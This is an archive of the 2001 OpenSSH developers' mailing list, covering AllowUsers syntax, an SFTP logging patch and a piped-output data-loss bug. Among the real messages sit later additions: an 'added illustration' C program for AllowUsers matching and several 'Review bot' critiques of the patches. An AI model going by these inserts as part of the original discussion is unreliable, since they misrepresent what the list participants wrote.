Hmm, not much meets the stated criteria. I'll also quote one small passage: <<< Finally, here is a useful configuration example, expressed in SSH1 syntax: AllowUsers walrus@* carpenter@* *@*.beach.net >>> We can cross out "probably referring" and replace it with "explicitly states". The SSH book explicitly documents that OpenSSH handles this syntax (erroneously for the time being) with a tip of the hat about the utility of this feature. Allan From abartlet at pcug.org.au Fri Jun 15 10:27:54 2001
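To make the semantics of the user@host form under discussion concrete, here is an added illustration (not OpenSSH code and not Andrew's patch) of how such an AllowUsers list would be evaluated: a bare entry matches the user name from any host, and userpattern@hostpattern requires both halves to match, with * and ? as in the book's examples. The function names are the example's own, and it assumes sshd would hand it the already-resolved client host name or address as a string.

```c
/* Added illustration (not OpenSSH code, not Andrew Tridgell's patch) of how an
 * AllowUsers list using the "user@hostpattern" form discussed in this thread
 * would be evaluated. Assumption: sshd would pass the already-resolved client
 * host name or address as `host`; the illustration only compares strings. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Shell-style wildcard match: '*' matches any run of characters (including
 * none), '?' matches exactly one; everything else matches literally. */
static bool glob_match(const char *pat, const char *s)
{
    for (;;) {
        if (*pat == '\0')
            return *s == '\0';
        if (*pat == '*') {
            while (*pat == '*')          /* "**" behaves like "*" */
                pat++;
            if (*pat == '\0')
                return true;             /* trailing '*' swallows the rest */
            for (; *s != '\0'; s++)      /* try every possible split point */
                if (glob_match(pat, s))
                    return true;
            return false;
        }
        if (*s == '\0')
            return false;
        if (*pat != '?' && *pat != *s)
            return false;
        pat++;
        s++;
    }
}

/* One AllowUsers entry: "userpattern" alone matches that user from any host;
 * "userpattern@hostpattern" requires both halves to match. */
static bool entry_allows(const char *entry, const char *user, const char *host)
{
    const char *at = strchr(entry, '@');
    char upat[64];
    size_t ulen;

    if (at == NULL)
        return glob_match(entry, user);
    ulen = (size_t)(at - entry);
    if (ulen >= sizeof upat)             /* oversized entry: refuse, never allow */
        return false;
    memcpy(upat, entry, ulen);
    upat[ulen] = '\0';
    return glob_match(upat, user) && glob_match(at + 1, host);
}

/* Whitespace-separated AllowUsers list: the login is permitted only if some
 * entry matches; an empty or unparsable list allows nobody. */
static bool allow_users(const char *list, const char *user, const char *host)
{
    char copy[256];
    char *tok;

    if (strlen(list) >= sizeof copy)
        return false;
    strcpy(copy, list);
    for (tok = strtok(copy, " \t"); tok != NULL; tok = strtok(NULL, " \t"))
        if (entry_allows(tok, user, host))
            return true;
    return false;
}

int main(void)
{
    /* Constructed checks using the entries quoted in this thread. */
    const char *firewall = "wiz@*.myhouse.nat doorstep@*";
    const char *book = "walrus@* carpenter@* *@*.beach.net";

    printf("wiz from dev3.myhouse.nat:  %s\n",
           allow_users(firewall, "wiz", "dev3.myhouse.nat") ? "allowed" : "denied");
    printf("wiz from host.example.org:  %s\n",
           allow_users(firewall, "wiz", "host.example.org") ? "allowed" : "denied");
    printf("anyone from surf.beach.net: %s\n",
           allow_users(book, "anyone", "surf.beach.net") ? "allowed" : "denied");
    return 0;
}
```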
From: abartlet at pcug.org.au (Andrew Bartlett) Date: Fri, 15 Jun 2001 10:27:54 +1000 Subject: SFTP Logging References: <20010614075814.A24420@dour.org> Message-ID: <3B29568A.9E2BC874@bartlett.house> "Jason A . Dour" wrote: > > Hello everyone, > > Has there been any thought given to giving the SFTP subsystem better > logging capabilities? We are looking to replace FTP, Telnet, and > Rexec completely, but our FTP is presently logged and any > replacement for it would also need to be logged. Specifically, we > need to know about file uploads and downloads, deletions, et cetera. > > I've added some logging code to sftp-server.c, and would be happy to > supply patches if it is of any interest at all. There obviously > isn't much code to it, except for an extra function that parses > pflags into a readable text string. > > Cheers, > Jason > # "Jason A. Dour" http://dour.org/ > # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ Remember that it will amount to moot unless you use a restricted shell, like the one I have posted to this list earlier, as otherwise users can just use their own SFTP server - without your logging capabilities. Andrew Bartlett -- Andrew Bartlett abartlet at pcug.org.au From jmknoble at jmknoble.cx Fri Jun 15 11:20:29 2001
From: jmknoble at jmknoble.cx (Jim Knoble) Date: Thu, 14 Jun 2001 20:20:29 -0500 Subject: SFTP Logging In-Reply-To: <3B29568A.9E2BC874@bartlett.house>; from abartlet@pcug.org.au on Fri, Jun 15, 2001 at 10:27:54AM +1000 References: <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> Message-ID: <20010614202029.B1274@zax.half.pint-stowp.cx> Circa 2001-Jun-15 10:27:54 +1000 dixit Andrew Bartlett: : "Jason A . Dour" wrote: : > Has there been any thought given to giving the SFTP subsystem better : > logging capabilities? : : Remember that it will amount to moot unless you use a restricted shell, : like the one I have posted to this list earlier, as otherwise users can : just use their own SFTP server - without your logging capabilities. Such as 'cat'. -- jim knoble | jmknoble at jmknoble.cx | http://www.jmknoble.cx/ (GnuPG fingerprint: 31C4:8AAC:F24E:A70C:4000::BBF4:289F:EAA8:1381:1491) From jason at shalott.net Fri Jun 15 11:25:58 2001
From: jason at shalott.net (Jason Stone) Date: Thu, 14 Jun 2001 18:25:58 -0700 (PDT) Subject: SFTP Logging In-Reply-To: <3B29568A.9E2BC874@bartlett.house> Message-ID: > > Has there been any thought given to giving the SFTP subsystem better > > logging capabilities? We are looking to replace FTP, Telnet, and > > Rexec completely, but our FTP is presently logged and any > > replacement for it would also need to be logged. Specifically, we > > need to know about file uploads and downloads, deletions, et cetera. > > Remember that it will amount to moot unless you use a restricted shell, > like the one I have posted to this list earlier, as otherwise users > can just use their own SFTP server - without your logging > capabilities. "Unless you're using keys." I'm always in favor of more logging options. -Jason ----------------------------------------------------------------------- I worry about my child and the Internet all the time, even though she's too young to have logged on yet. Here's what I worry about. I worry that 10 or 15 years from now, she will come to me and say "Daddy, where were you when they took freedom of the press away from the Internet?" -- Mike Godwin From anshul at raplix.com Fri Jun 15 12:51:26 2001
From: anshul at raplix.com (Anshul Jaiswal) Date: Thu, 14 Jun 2001 19:51:26 -0700 Subject: ssh hangs on remote command execution Message-ID: <6C251CBEC6AE574E8EAE7E80B1D3591526A342@mailserver.reactivity.com> Hi, I am using OpenSSH_2.5.2p2 on SunOS 5.8 [sparc] for remote command execution. A couple of times I see a bunch of hanging ssh clients even after the client that invoked ssh dies and the remote process dies. After doing some investigation I figured that the ssh client still had a socket open to the remote sshd process and both the processes were hung on poll(). I'd expect the sshd process to shut itself when it sees that the child process it spawned to execute the remote command is done. Is there something wrong with the way ssh is configured or the way I am using ssh? I use ssh to invoke commands on remote machines that in turn invoke commands on remote machines using ssh. Any help will be greatly appreciated! Thanks in advance, Anshul.
From markus.friedl at informatik.uni-erlangen.de Fri Jun 15 21:20:41 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Fri, 15 Jun 2001 13:20:41 +0200 Subject: user@host in AllowUsers In-Reply-To: ; from allan@stokes.ca on Thu, Jun 14, 2001 at 07:42:54AM -0700 References: Message-ID: <20010615132041.B27642@folly> On Thu, Jun 14, 2001 at 07:42:54AM -0700, Allan Stokes wrote: > > > > This has been a feature of SSH.COM's sshd for a long time, and this is > > what the book is probably referring to. > > On page 6 the SSH book provides a secret decoder ring: yes, it looks like a bug in the book. tell the authors, but perhaps it's easier to add this in openssh-3.0 -m From jason at dour.org Sat Jun 16 00:37:49 2001
From: jason at dour.org (Jason A . Dour) Date: Fri, 15 Jun 2001 10:37:49 -0400 Subject: SFTP Logging In-Reply-To: <3B29568A.9E2BC874@bartlett.house>; from abartlet@pcug.org.au on Fri, Jun 15, 2001 at 10:27:54AM +1000 References: <3B29568A.9E2BC874@bartlett.house> <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> <20010614202029.B1274@zax.half.pint-stowp.cx> <20010614075814.A24420@dour.org> <3B29568A.9E2BC874@bartlett.house> Message-ID: <20010615103749.A25892@dour.org> On Fri, Jun 15, 2001 at 10:27:54AM +1000, Andrew Bartlett wrote: > Remember that it will amount to moot unless you use a restricted > shell, like the one I have posted to this list earlier, as > otherwise users can just use their own SFTP server - without your > logging capabilities. True. But I'm also coding such a shell to meet my needs for SFTP/SCP restricted users only. And I'm also spelunking the OpenSSH codebase to see about separating authentication and authorization. I don't know if authent/authoriz separation has been discussed before, but regardless of the authentication method I've allowed, I need to restrict what a user can do. I haven't come up with a clear solution yet, but I've a few ideas forming... On Thu, Jun 14, 2001 at 06:25:58PM -0700, Jason Stone wrote: > I'm always in favor of more logging options. I've attached a diff versus the 2.9p1 release (I apologize for my lack of CVS-ness). It covers logging of most major operations. The logline is constructed to include the parent PID, the UID of the user, and the UserName of the user for tracking/tie-back purposes: sftp-server[PID]: (PPID/UID/UNAME) Entry Possible cleanups...look at a better way to do sflags_from_portable. Presently the function that converts portable to "string flags" such as "(rwacte)" presently uses pointers to modify character values in a fixed-length string. I did it this way to avoid using any string.h functions that are not used throughout the program. 
Possible additions...look at logging a virtual current working directory via logging send_names. Not great since there really isn't a CWD with SFTP server, but it is a potential tidbit of information admins might want. Also potentially log uses of '..' in realpath as a paranoia check for admins who might want it. chroot() would be a better answer for this paranoia, but I presently do not have a chroot() solution. Feedback is appreciated. I apologize if I'm a bit unorthodox in my delivery of this contribution...it's been a while since I've been eye-deep in code (since the birth of suEXEC actually), and I'm a bit rusty. Cheers, Jason # "Jason A. Dour" http://dour.org/ # Founder / Executive Producer - PJ Harvey Online - http://pjh.org/ -------------- next part -------------- *** sftp-server.c.orig Mon Jun 11 12:18:31 2001 --- sftp-server.c Fri Jun 15 09:06:31 2001 *************** *** 52,59 **** /* Version of client */ int version; ! /* portable attibutes, etc. */ typedef struct Stat Stat; struct Stat { --- 52,65 ---- /* Version of client */ int version; ! /* User information. */ ! #define CUNAME cuname ? cuname : "UNKNOWN" ! struct passwd *upw; ! uid_t cuid; ! pid_t ppid; ! char *cuname; + /* portable attibutes, etc. 
*/ typedef struct Stat Stat; struct Stat { *************** *** 115,120 **** --- 121,148 ---- return flags; } + void + sflags_from_portable(char *psflags, int pflags) + { + if (pflags & SSH2_FXF_READ) + *psflags = 'r'; + psflags++; + if (pflags & SSH2_FXF_WRITE) + *psflags = 'w'; + psflags++; + if (pflags & SSH2_FXF_APPEND) + *psflags = 'a'; + psflags++; + if (pflags & SSH2_FXF_CREAT) + *psflags = 'c'; + psflags++; + if (pflags & SSH2_FXF_TRUNC) + *psflags = 't'; + psflags++; + if (pflags & SSH2_FXF_EXCL) + *psflags = 'e'; + } + Attrib * get_attrib(void) { *************** *** 370,375 **** --- 398,404 ---- version = buffer_get_int(&iqueue); TRACE("client version %d", version); + log("(%d/%d/%s) Client version %d", ppid, cuid, CUNAME, version); buffer_init(&msg); buffer_put_char(&msg, SSH2_FXP_VERSION); buffer_put_int(&msg, SSH2_FILEXFER_VERSION); *************** *** 382,388 **** { u_int32_t id, pflags; Attrib *a; ! char *name; int handle, fd, flags, mode, status = SSH2_FX_FAILURE; id = get_int(); --- 411,417 ---- { u_int32_t id, pflags; Attrib *a; ! char *name, sflags[7] = "------"; int handle, fd, flags, mode, status = SSH2_FX_FAILURE; id = get_int(); *************** *** 390,397 **** --- 419,428 ---- pflags = get_int(); /* portable flags */ a = get_attrib(); flags = flags_from_portable(pflags); + sflags_from_portable(&sflags[0], pflags); mode = (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) ? 
a->perm : 0666; TRACE("open id %d name %s flags %d mode 0%o", id, name, pflags, mode); + log("(%d/%d/%s) File/Dir opened: %s (%s,%04o)", ppid, cuid, CUNAME, name, sflags, mode); fd = open(name, flags, mode); if (fd < 0) { status = errno_to_portable(errno); *************** *** 589,594 **** --- 620,626 ---- name = get_string(NULL); a = get_attrib(); TRACE("setstat id %d name %s", id, name); + log("(%d/%d/%s) Permissions altered: %s (%04o).", ppid, cuid, CUNAME, name, a->perm & 0777); if (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) { ret = chmod(name, a->perm & 0777); if (ret == -1) *************** *** 623,628 **** --- 655,661 ---- TRACE("fsetstat id %d handle %d", id, handle); fd = handle_to_fd(handle); name = handle_to_name(handle); + log("(%d/%d/%s) Permissions altered: %s (%04o).", ppid, cuid, CUNAME, name, a->perm & 0777); if (fd < 0 || name == NULL) { status = SSH2_FX_FAILURE; } else { *************** *** 790,795 **** --- 823,829 ---- id = get_int(); name = get_string(NULL); TRACE("remove id %d name %s", id, name); + log("(%d/%d/%s) File deleted: %s", ppid, cuid, CUNAME, name); ret = unlink(name); status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; send_status(id, status); *************** *** 810,815 **** --- 844,850 ---- mode = (a->flags & SSH2_FILEXFER_ATTR_PERMISSIONS) ? a->perm & 0777 : 0777; TRACE("mkdir id %d name %s mode 0%o", id, name, mode); + log("(%d/%d/%s) Directory created: %s", ppid, cuid, CUNAME, name); ret = mkdir(name, mode); status = (ret == -1) ? errno_to_portable(errno) : SSH2_FX_OK; send_status(id, status); *************** *** 826,831 **** --- 861,867 ---- id = get_int(); name = get_string(NULL); TRACE("rmdir id %d name %s", id, name); + log("(%d/%d/%s) Directory deleted: %s", ppid, cuid, CUNAME, name); ret = rmdir(name); status = (ret == -1) ? 
errno_to_portable(errno) : SSH2_FX_OK; send_status(id, status); *************** *** 869,874 **** --- 905,911 ---- oldpath = get_string(NULL); newpath = get_string(NULL); TRACE("rename id %d old %s new %s", id, oldpath, newpath); + log("(%d/%d/%s) File/Dir renamed: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); /* fail if 'newpath' exists */ if (stat(newpath, &st) == -1) { ret = rename(oldpath, newpath); *************** *** 914,919 **** --- 951,957 ---- oldpath = get_string(NULL); newpath = get_string(NULL); TRACE("symlink id %d old %s new %s", id, oldpath, newpath); + log("(%d/%d/%s) Symbolic link created: %s -> %s", ppid, cuid, CUNAME, oldpath, newpath); /* fail if 'newpath' exists */ if (stat(newpath, &st) == -1) { ret = symlink(oldpath, newpath); *************** *** 951,956 **** --- 989,995 ---- msg_len = GET_32BIT(cp); if (msg_len > 256 * 1024) { error("bad message "); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Bad Message"); exit(11); } if (buffer_len(&iqueue) < msg_len + 4) *************** *** 1031,1045 **** --- 1070,1102 ---- int in, out, max; ssize_t len, olen, set_size; + /* XXX should use getopt */ __progname = get_progname(av[0]); handle_init(); + /* Initialize the username of the user running the process. */ + cuid = getuid(); + if ((upw = getpwuid(cuid)) == NULL) { + cuname = NULL; + } else { + cuname = upw->pw_name; + } + + /* Initialize the parent process ID. */ + ppid = getppid(); + + /* Initialize the logfile, loglevel dependent on DEBUG compile-time setting. */ #ifdef DEBUG_SFTP_SERVER log_init("sftp-server", SYSLOG_LEVEL_DEBUG1, SYSLOG_FACILITY_AUTH, 0); + #else + log_init("sftp-server", SYSLOG_LEVEL_INFO, SYSLOG_FACILITY_AUTH, 0); #endif + /* Log session start. 
*/ + log("(%d/%d/%s) SFTP session started.", ppid, cuid, CUNAME); + in = dup(STDIN_FILENO); out = dup(STDOUT_FILENO); *************** *** 1073,1078 **** --- 1130,1136 ---- if (select(max+1, rset, wset, NULL, NULL) < 0) { if (errno == EINTR) continue; + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Select Error"); exit(2); } *************** *** 1082,1090 **** --- 1140,1150 ---- len = read(in, buf, sizeof buf); if (len == 0) { debug("read eof"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "EOF"); exit(0); } else if (len < 0) { error("read error"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Read Error"); exit(1); } else { buffer_append(&iqueue, buf, len); *************** *** 1095,1100 **** --- 1155,1161 ---- len = write(out, buffer_ptr(&oqueue), olen); if (len < 0) { error("write error"); + log("(%d/%d/%s) SFTP session closing (%s).", ppid, cuid, CUNAME, "Write Error"); exit(1); } else { buffer_consume(&oqueue, len); From mouring at etoh.eviladmin.org Sat Jun 16 03:21:51 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Fri, 15 Jun 2001 12:21:51 -0500 (CDT) Subject: question about Ultrix system In-Reply-To: <7373531239.20010615181151@dezcom.org> Message-ID: If you can describe the problem someone on the OpenSSH Development list may be able to help you through it. - Ben On Fri, 15 Jun 2001, Ilya Kallistratov wrote: > Hello! > I have such trouble - I can't use OpenSSH under system ULTRIX V4.3/UWS > V4.3 (Rev. 44). Could you tell me please, would OpenSSH be available > on it? > Sorry for disturbing you. > > > -- > Best regards, > Ilya Kallistratov > mailto:ilya at dezcom.org > > From pspencer at fields.utoronto.ca Sat Jun 16 04:19:44 2001 
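Review bot: in the sftp-server.c patch above, the `*** 623,628 ****` (fsetstat) hunk formats `name` with %s in the new log() call before the `if (fd < 0 || name == NULL)` check that follows it, so a bad handle passes a NULL pointer to the formatter; move the log call into the else branch. Both this hunk and the setstat one also print "Permissions altered ... (%04o)" whether or not SSH2_FILEXFER_ATTR_PERMISSIONS is set in a->flags, so a setstat that only touches times or ownership is recorded as a mode change; guard the message with the same flag test the chmod() uses.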
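Review bot: the open, remove, mkdir, rmdir, rename and symlink hunks of the sftp-server.c patch all emit their audit line before the system call and never record `status`, so the log will say "File deleted: x" for an unlink() that failed with ENOENT or EACCES; since the stated purpose is to know what users actually did, log after the call and include the outcome, or at least log failures on their own line. The paths in those lines (`name`, `oldpath`, `newpath`) are client-supplied and go to syslog verbatim, newlines and control characters included, so they should be sanitized before logging; the existing TRACE() has the same weakness, but only at debug level.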
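Review bot: sflags_from_portable() in the `*** 115,120 ****` hunk depends on the caller pre-filling a 7-byte buffer with "------" (which the open hunk does via `sflags[7] = "------"`) and never writes the terminator itself, so any later caller with a plain `char sflags[7]` gets an unterminated string; take the buffer length and fill all six slots plus the NUL inside the function, for instance with `snprintf(buf, len, "%c%c%c%c%c%c", pflags & SSH2_FXF_READ ? 'r' : '-', ...)`. In the main() hunk, the new `#else` branch calls log_init() at SYSLOG_LEVEL_INFO for every non-debug build, which makes the audit lines unconditional for all installations rather than something an administrator turns on; consider tying them to sshd's log level or a command-line option (the added `/* XXX should use getopt */` already points that way).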
From: pspencer at fields.utoronto.ca (Philip Spencer) Date: Fri, 15 Jun 2001 14:19:44 -0400 (EDT) Subject: openssh 2.9p1: data loss when stdout sent to a pipe Message-ID: We recently tried upgrading openssh from 2.5.2p2 to 2.9p1 and discovered that it no longer worked to feed the output from a remote command into a pipe, unless the output was short and the pipe was very fast at processing its input. Example 1: ssh remote_machine some_command | less (where "some_command" generates a lot of output) now fails after the first screenful, with a "Write failed flushing stdout buffer" message. Example 2: ssh remote_machine 'yes | head -2000' | (sleep 3 ; wc -l) With openssh 2.5.2p2 this correctly returns "2000". With 2.9p1 we get Write failed flushing stdout buffer. 1024 This is on both Linux (RedHat 7.0) and Irix (6.5.11). Investigation reveals that this problem was caused by the addition of lines into clientloop.c that force non-blocking mode onto the stdout channel. Applying the following patch (to revert that portion of clientloop.c to its state as of openssh2.5.2p2) fixes the problem: --- openssh-2.9p1/clientloop.c.losesdata Fri Apr 20 08:50:51 2001 +++ openssh-2.9p1/clientloop.c Fri Jun 15 14:13:32 2001 
@@ -787,12 +787,15 @@ if (!compat20) { /* enable nonblocking unless tty */ + /* REMOVED for now since it prevents ssh command output from + being reliably sent to a pipe. - PHS 2001/06/15 if (!isatty(fileno(stdin))) set_nonblock(fileno(stdin)); if (!isatty(fileno(stdout))) set_nonblock(fileno(stdout)); if (!isatty(fileno(stderr))) set_nonblock(fileno(stderr)); + */ max_fd = MAX(max_fd, fileno(stdin)); max_fd = MAX(max_fd, fileno(stdout)); max_fd = MAX(max_fd, fileno(stderr)); Now, presumably those lines were added to the source code to address some other problem (perhaps one of the hanging problems I see mentioned on the list?) So simply removing them as per my patch above, while it works fine on our site, probably isn't the optimal solution. But leaving them in isn't a solution either, since it broke several of our scripts that fed ssh output into a pipe for processing! --------------------------------------------+------------------------------- Philip Spencer pspencer at fields.utoronto.ca | Director of Computing Services Room 336 (416)-348-9710 ext3036 | The Fields Institute for 222 College St, Toronto ON M5T 3J1 Canada | Research in Mathematical Sciences From pspencer at fields.utoronto.ca Sat Jun 16 04:48:02 2001 
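Review bot: the hunk turns off non-blocking mode for stdin as well as stdout and stderr, although the failure being fixed is only in the final flush of stdout, and it does so by wrapping the six lines in a `/* ... */` block rather than deleting them, which leaves dead code behind. Since the mail itself suspects these lines were added to cure a hang, the narrower change is to keep set_nonblock() during the client loop and switch the non-tty descriptors back to blocking (unset_nonblock() on each fd for which isatty() is false) immediately before the stdout/stderr buffers are flushed, or to make the flush loop wait for writability on EAGAIN instead of treating every write() <= 0 as fatal.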
From: pspencer at fields.utoronto.ca (Philip Spencer) Date: Fri, 15 Jun 2001 14:48:02 -0400 (EDT) Subject: ssh & pipe In-Reply-To: <200106151841.LAA01182@c572157-a.sttln1.wa.home.com> Message-ID: Sorry, I forgot to include the -n flag in my examples. Previous pipe problems in openssh were indeed cured by adding -n as you suggest, but this current problem is occurring even with the -n option. Thanks for the reminder, though. The -n was in the original script that was failing, but I forgot it when generating the test-case examples. But alas, even with the -n the test-case examples still fail. :( - Philip. On Fri, 15 Jun 2001, John Dunlap wrote: > > We recently tried upgrading openssh from 2.5.2p2 to 2.9p1 > > and discovered that it no longer worked to feed the output from a remote > > command into a pipe, unless the output was short and the pipe was very > > fast at processing its input. > > > Example 1: ssh remote_machine some_command | less > > I cured this by adding -n to the ssh options: > > ssh -n remote_machine some_command | less > > -- > John Dunlap University of Washington > Senior Electrical Engineer Applied Physics Laboratory > dunlap at apl.washington.edu 1013 NE 40th Street > 206-543-7207, 543-1300, FAX 543-6785 Seattle, WA 98105-6698 > --------------------------------------------+------------------------------- Philip Spencer pspencer at fields.utoronto.ca | Director of Computing Services Room 336 (416)-348-9710 ext3036 | The Fields Institute for 222 College St, Toronto ON M5T 3J1 Canada | Research in Mathematical Sciences From Markus.Friedl at informatik.uni-erlangen.de Sat Jun 16 06:14:41 2001 
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Fri, 15 Jun 2001 22:14:41 +0200 Subject: ssh & pipe In-Reply-To: ; from pspencer@fields.utoronto.ca on Fri, Jun 15, 2001 at 02:48:02PM -0400 References: <200106151841.LAA01182@c572157-a.sttln1.wa.home.com> Message-ID: <20010615221441.A23687@faui02.informatik.uni-erlangen.de> do you have a ssh -v -v -v output for your test case? -m On Fri, Jun 15, 2001 at 02:48:02PM -0400, Philip Spencer wrote: > Sorry, I forgot to include the -n flag in my examples. > > Previous pipe problems in openssh were indeed cured by adding -n as > you suggest, but this current problem is occurring even with the -n option. > > Thanks for the reminder, though. The -n was in the original script that > was failing, but I forgot it when generating the test-case examples. > > But alas, even with the -n the test-case examples still fail. :( > > - Philip. > > On Fri, 15 Jun 2001, John Dunlap wrote: > > > > We recently tried upgrading openssh from 2.5.2p2 to 2.9p1 > > > and discovered that it no longer worked to feed the output from a remote > > > command into a pipe, unless the output was short and the pipe was very > > > fast at processing its input. > > > > > Example 1: ssh remote_machine some_command | less > > > > I cured this by adding -n to the ssh options: > > > > ssh -n remote_machine some_command | less > > > > -- > > John Dunlap University of Washington > > Senior Electrical Engineer Applied Physics Laboratory > > dunlap at apl.washington.edu 1013 NE 40th Street > > 206-543-7207, 543-1300, FAX 543-6785 Seattle, WA 98105-6698 > > > > --------------------------------------------+------------------------------- > Philip Spencer pspencer at fields.utoronto.ca | Director of Computing Services > Room 336 (416)-348-9710 ext3036 | The Fields Institute for > 222 College St, Toronto ON M5T 3J1 Canada | Research in Mathematical Sciences > From Markus.Friedl at informatik.uni-erlangen.de Sat Jun 16 06:17:19 2001 
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Fri, 15 Jun 2001 22:17:19 +0200 Subject: openssh 2.9p1: data loss when stdout sent to a pipe In-Reply-To: ; from pspencer@fields.utoronto.ca on Fri, Jun 15, 2001 at 02:19:44PM -0400 References: Message-ID: <20010615221719.B23687@faui02.informatik.uni-erlangen.de> On Fri, Jun 15, 2001 at 02:19:44PM -0400, Philip Spencer wrote: > --- openssh-2.9p1/clientloop.c.losesdata Fri Apr 20 08:50:51 2001 > +++ openssh-2.9p1/clientloop.c Fri Jun 15 14:13:32 2001 > @@ -787,12 +787,15 @@ > > if (!compat20) { > /* enable nonblocking unless tty */ > + /* REMOVED for now since it prevents ssh command output from > + being reliably sent to a pipe. - PHS 2001/06/15 > if (!isatty(fileno(stdin))) > set_nonblock(fileno(stdin)); > if (!isatty(fileno(stdout))) > set_nonblock(fileno(stdout)); > if (!isatty(fileno(stderr))) > set_nonblock(fileno(stderr)); > + */ > max_fd = MAX(max_fd, fileno(stdin)); > max_fd = MAX(max_fd, fileno(stdout)); > max_fd = MAX(max_fd, fileno(stderr)); > > Now, presumably those lines were added to the source code to address some > other problem (perhaps one of the hanging problems I see mentioned on the > list?) So simply removing them as per my patch above, while it works fine > on our site, probably isn't the optimal solution. we now do this (in -current): /* restore blocking io */ if (!isatty(fileno(stdin))) unset_nonblock(fileno(stdin)); if (!isatty(fileno(stdout))) unset_nonblock(fileno(stdout)); if (!isatty(fileno(stderr))) unset_nonblock(fileno(stderr)); before flushing stdout/stderr. -m From carson at taltos.org Sat Jun 16 06:56:05 2001 
From: carson at taltos.org (Carson Gaspar) Date: Fri, 15 Jun 2001 13:56:05 -0700 Subject: openssh 2.9p1: data loss when stdout sent to a pipe In-Reply-To: Message-ID: <475920254.992613365@ZATHROS> We're seeing the same thing here. Sadly, the flush code is... ummm... differently written. It assumes _any_ return from write <= 0 is an unrecoverable error and bombs. It doesn't check for EAGAIN or EINTR, much less EWOULDBLOCK. -- Carson Gaspar - carson at taltos.org Queen trapped in a butch body From stevev at darkwing.uoregon.edu Sat Jun 16 07:49:44 2001 
From: stevev at darkwing.uoregon.edu (Steve VanDevender) Date: Fri, 15 Jun 2001 14:49:44 -0700 Subject: no // comments, please Message-ID: <15146.33528.118362.897059@darkwing.uoregon.edu> Non-gcc compilers tend not to like C++-style // comments in plain C code, as I discovered when trying to build the latest snapshot (20010615) with the Tru64 UNIX C compiler. *** channels.h.orig Fri Jun 8 18:20:07 2001 --- channels.h Fri Jun 15 14:41:01 2001 *************** *** 209,215 **** /* x11 forwarding */ int x11_connect_display(void); ! //int x11_check_cookie(Buffer *b); char *x11_create_display(int screen); char *x11_create_display_inet(int screen, int x11_display_offset); void x11_input_open(int type, int plen, void *ctxt); --- 209,215 ---- /* x11 forwarding */ int x11_connect_display(void); ! /*int x11_check_cookie(Buffer *b);*/ char *x11_create_display(int screen); char *x11_create_display_inet(int screen, int x11_display_offset); void x11_input_open(int type, int plen, void *ctxt); I can also vouch for the problems with building OpenSSH under more recent Tru64 UNIX versions (I have 4.0G) where -D_SOCKADDR_LEN is necessary to get the right sockaddr structure defined in sys/socket.h. What's particularly annoying about this problem is that if you don't build with -D_SOCKADDR_LEN, the compilation finishes successfully and you get the rather non-obvious error message "Secure connection to foo refused" from the ssh binary produced. From carson at taltos.org Sat Jun 16 08:19:16 2001 
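Review bot: the `*** 209,215 ****` hunk converts a commented-out prototype from `//` to `/* */`, so `/*int x11_check_cookie(Buffer *b);*/` still declares nothing; if x11_check_cookie() is gone, delete the line, and if it is coming back, declare it properly so callers get a prototype. The comment-style change itself is right for the portable tree, which has to build with pre-C99 compilers such as the Tru64 cc mentioned above.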
From: carson at taltos.org (Carson Gaspar) Date: Fri, 15 Jun 2001 15:19:16 -0700 Subject: Patch for stdout/stderr buffer flush write() handling Message-ID: <480910633.992618356@ZATHROS> The attached patch against today's CVS improves write() error handling and logging in clientloop.c when flushing stdout/stderr. -- Carson Gaspar - carson at taltos.org Queen trapped in a butch body -------------- next part -------------- A non-text attachment was scrubbed... Name: clientloop.c.diff Type: application/octet-stream Size: 966 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010615/58f3dafb/attachment.obj From crist.clark at globalstar.com Sat Jun 16 08:20:03 2001 
From: crist.clark at globalstar.com (Crist Clark) Date: Fri, 15 Jun 2001 15:20:03 -0700 Subject: Default Path in sshd_config Message-ID: <3B2A8A13.67050307@globalstar.com> I was just building binary Solaris packages of OpenSSH for use at our company. While doing so, it occurred to me that the only thing that really stops me from being able to make a binary build totally relocatable in the filesystem tree is the default path. Other than that, I cannot think of any file path that cannot be modified with either a command line option or in a configuration file. Is there a reason that, for example, DefaultPath /opt/openssh/bin Could not be something put into the sshd_config file? Or does this exist in the code, but not (or I missed it) in the documentation? (Oh, and I still need to hack around with the manpages by hand to get them to work in Solaris, but I think that is a known issue?) -- Crist J. Clark Network Security Engineer crist.clark at globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster at globalstar.com From carson at taltos.org Sat Jun 16 08:20:40 2001 From: carson at taltos.org (Carson Gaspar) Date: Fri, 15 Jun 2001 15:20:40 -0700 Subject: EOL problem with channels.h in CVS Message-ID: <480995445.992618440@ZATHROS> channels.h from today's CVS has MS-DOS ^M end-of-line chars. -- Carson Gaspar - carson at taltos.org Queen trapped in a butch body From pspencer at fields.utoronto.ca Sat Jun 16 08:22:27 2001 
